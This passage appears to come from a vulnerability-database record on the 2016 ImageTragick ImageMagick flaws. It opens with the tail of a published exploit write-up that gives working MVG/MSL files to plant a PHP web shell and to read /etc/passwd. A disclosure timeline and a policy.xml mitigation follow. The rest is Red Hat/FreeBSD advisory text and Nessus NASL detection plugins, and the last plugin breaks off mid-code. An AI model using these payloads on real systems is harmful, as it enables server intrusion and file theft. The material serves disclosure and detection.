location - /tmp/ for PoC (in real life\r\nit may be web service written in PHP, which allows to upload raw txt\r\nfiles and process images with ImageMagick):\r\n \r\nfile_move.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\r\npopgraphic-context\r\n \r\n/tmp/msl.txt\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n<read filename=\"/tmp/image.gif\" />\r\n<write filename=\"/var/www/shell.php\" />\r\n</image>\r\n \r\n/tmp/image.gif - image with php shell inside\r\n(https://www.secgeek.net/POC/POC.gif for example)\r\n \r\n$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php\r\n \r\n5. CVE-2016-3717 - Local file read (independently reported by original\r\nresearch author - https://hackerone.com/stewie)\r\nIt is possible to get content of the files from the server by using\r\nImageMagick's 'label' pseudo protocol:\r\n \r\nfile_read.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'label:@...c/passwd'\r\npop graphic-context\r\n \r\n$ convert file_read.mvg out.png # produces file with text rendered from\r\n/etc/passwd\r\n \r\n \r\nHow to mitigate the vulnerability.\r\n \r\nAvailable patches appear to be incomplete.\r\nIf you use ImageMagick or an affected library, we recommend you mitigate\r\nthe known vulnerabilities by doing at least one these two things (but\r\npreferably both!):\r\n1. Verify that all image files begin with the expected \ufffdmagic bytes\ufffd\r\ncorresponding to the image file types you support before sending them to\r\nImageMagick for processing. (see FAQ for more info)\r\n2. Use a policy file to disable the vulnerable ImageMagick coders. The\r\nglobal policy for ImageMagick is usually found in \ufffd/etc/ImageMagick\ufffd.\r\nThis policy.xml example will disable the coders EPHEMERAL, URL, MVG, and\r\nMSL:\r\n \r\n<policymap>\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\r\n</policymap>\r\n \r\n \r\nVulnerability Disclosure Timeline:\r\nApril, 21 2016 - file read vulnerability report for one of My.Com\r\nservices from https://hackerone.com/stewie received by Mail.Ru Security\r\nTeam. Issue is reportedly known to ImageMagic team.\r\nApril, 21 2016 - file read vulnerability patched by My.Com development team\r\nApril, 28 2016 - code execution vulnerability in ImageMagick was found\r\nby Nikolay Ermishkin from Mail.Ru Security Team while researching\r\noriginal report\r\nApril, 30 2016 - code execution vulnerability reported to ImageMagick\r\ndevelopment team\r\nApril, 30 2016 - code execution vulnerability fixed by ImageMagick\r\n(incomplete fix)\r\nApril, 30 2016 - fixed ImageMagic version 6.9.3-9 published (incomplete fix)\r\nMay, 1 2016 - ImageMagic informed of the fix bypass\r\nMay, 2 2016 - limited disclosure to 'distros' mailing list\r\nMay, 3 2016 - public disclosure at https://imagetragick.com/\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/25991", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T12:50:39", "description": "From Red Hat Security Advisory 2016:0726 :\n\nAn update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.", "edition": 27, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "title": "Oracle Linux 6 / 7 : ImageMagick (ELSA-2016-0726) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-11T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ImageMagick-c++", "cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:ImageMagick", "p-cpe:/a:oracle:linux:ImageMagick-devel", "p-cpe:/a:oracle:linux:ImageMagick-doc", "p-cpe:/a:oracle:linux:ImageMagick-c++-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:ImageMagick-perl"], "id": "ORACLELINUX_ELSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:0726 and \n# Oracle Linux Security Advisory ELSA-2016-0726 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91032);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n\n script_name(english:\"Oracle Linux 6 / 7 : ImageMagick (ELSA-2016-0726) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:0726 :\n\nAn update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-May/006020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-May/006021.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:47:18", "description": "Openwall reports :\n\nInsufficient filtering for filename passed to delegate's command\nallows remote code execution during conversion of several file\nformats. Any service which uses ImageMagick to process user-supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable\nto this issue.\n\nIt is possible to make ImageMagick perform a HTTP GET or FTP request\n\nIt is possible to delete files by using ImageMagick's 'ephemeral'\npseudo protocol which deletes files after reading.\n\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick).\n\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol.", "edition": 29, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "title": "FreeBSD : ImageMagick -- multiple vulnerabilities (0d724b05-687f-4527-9c03-af34d3b094ec) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ImageMagick", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ImageMagick7", "p-cpe:/a:freebsd:freebsd:ImageMagick-nox11", "p-cpe:/a:freebsd:freebsd:ImageMagick7-nox11"], "id": "FREEBSD_PKG_0D724B05687F45279C03AF34D3B094EC.NASL", "href": "https://www.tenable.com/plugins/nessus/90979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90979);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n\n script_name(english:\"FreeBSD : ImageMagick -- multiple vulnerabilities (0d724b05-687f-4527-9c03-af34d3b094ec) (ImageTragick)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Openwall reports :\n\nInsufficient filtering for filename passed to delegate's command\nallows remote code execution during conversion of several file\nformats. Any service which uses ImageMagick to process user-supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable\nto this issue.\n\nIt is possible to make ImageMagick perform a HTTP GET or FTP request\n\nIt is possible to delete files by using ImageMagick's 'ephemeral'\npseudo protocol which deletes files after reading.\n\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick).\n\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol.\"\n );\n # http://www.openwall.com/lists/oss-security/2016/05/03/18\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2016/05/03/18\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://imagetragick.com/\"\n );\n # https://vuxml.freebsd.org/freebsd/0d724b05-687f-4527-9c03-af34d3b094ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fafa51e6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick-nox11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick7-nox11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick<6.9.3.9_1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick-nox11<6.9.3.9_1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick7>=7.0.0.0.b20150715<7.0.1.0_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick7-nox11>=7.0.0.0.b20150715<7.0.1.0_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:32:25", "description": "The remote Windows host has a version of ImageMagick installed that is\nprior to 7.0.1-1 or 6.x prior to 6.9.3-10. It is, therefore, affected\nby the following vulnerabilities :\n\n - A remote code execution vulnerability, known as\n ImageTragick, exists due to a failure to properly filter\n shell characters in filenames passed to delegate\n commands. A remote attacker can exploit this, via\n specially crafted images, to inject shell commands and\n execute arbitrary code. (CVE-2016-3714)\n\n - An unspecified flaw exists in the 'ephemeral' pseudo\n protocol that allows an attacker to delete arbitrary\n files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the 'ms' pseudo protocol\n that allows an attacker to move arbitrary files to\n arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the 'label' pseudo\n protocol that allows an attacker, via a specially\n crafted image, to read arbitrary files. (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability\n exists due to an unspecified flaw related to request\n handling between a user and the server. A remote\n attacker can exploit this, via an MVG file with a\n specially crafted fill element, to bypass access\n restrictions and conduct host-based attacks.\n (CVE-2016-3718)", "edition": 29, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-04T00:00:00", "title": "ImageMagick < 7.0.1-1 / 6.x < 6.9.3-10 Multiple Vulnerabilities (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:imagemagick:imagemagick"], "id": "IMAGEMAGICK_7_0_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/90892", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90892);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\"\n );\n script_bugtraq_id(\n 89848,\n 89849,\n 89852,\n 89861,\n 89866\n );\n script_xref(name:\"CERT\", value:\"250519\");\n script_xref(name:\"EDB-ID\", value:\"39767\");\n script_xref(name:\"EDB-ID\", value:\"39791\");\n\n script_name(english:\"ImageMagick < 7.0.1-1 / 6.x < 6.9.3-10 Multiple Vulnerabilities (ImageTragick)\");\n script_summary(english:\"Checks the version of ImageMagick.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application installed that is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host has a version of ImageMagick installed that is\nprior to 7.0.1-1 or 6.x prior to 6.9.3-10. It is, therefore, affected\nby the following vulnerabilities :\n\n - A remote code execution vulnerability, known as\n ImageTragick, exists due to a failure to properly filter\n shell characters in filenames passed to delegate\n commands. A remote attacker can exploit this, via\n specially crafted images, to inject shell commands and\n execute arbitrary code. (CVE-2016-3714)\n\n - An unspecified flaw exists in the 'ephemeral' pseudo\n protocol that allows an attacker to delete arbitrary\n files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the 'ms' pseudo protocol\n that allows an attacker to move arbitrary files to\n arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the 'label' pseudo\n protocol that allows an attacker, via a specially\n crafted image, to read arbitrary files. (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability\n exists due to an unspecified flaw related to request\n handling between a user and the server. A remote\n attacker can exploit this, via an MVG file with a\n specially crafted fill element, to bypass access\n restrictions and conduct host-based attacks.\n (CVE-2016-3718)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.imagemagick.org/script/changelog.php\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588\");\n script_set_attribute(attribute:\"see_also\", value:\"https://imagetragick.com/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ImageMagick version 7.0.1-1 / 6.9.3-10 or later.\n\nNote that you may need to manually uninstall the vulnerable version\nfrom the system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:imagemagick:imagemagick\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"imagemagick_installed.nasl\");\n script_require_keys(\"installed_sw/ImageMagick\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ImageMagick\";\n\n# Get installs\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\ndisplay_version = install['display_version'];\nversion = install['version'];\nbuild = install['build'];\npath = install['path'];\n\nvuln = FALSE;\n\nif (version =~ \"^6\\.\")\n{\n fix = \"6.9.3\";\n fix_build = 10;\n}\nelse if (version =~ \"^7\\.\")\n{\n fix = \"7.0.1\";\n fix_build = 1;\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, display_version, path);\n\ndisplay_fix = fix + \"-\" + fix_build;\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n vuln = TRUE;\n\nif ((ver_compare(ver:version, fix:fix, strict:FALSE) == 0) &&\n 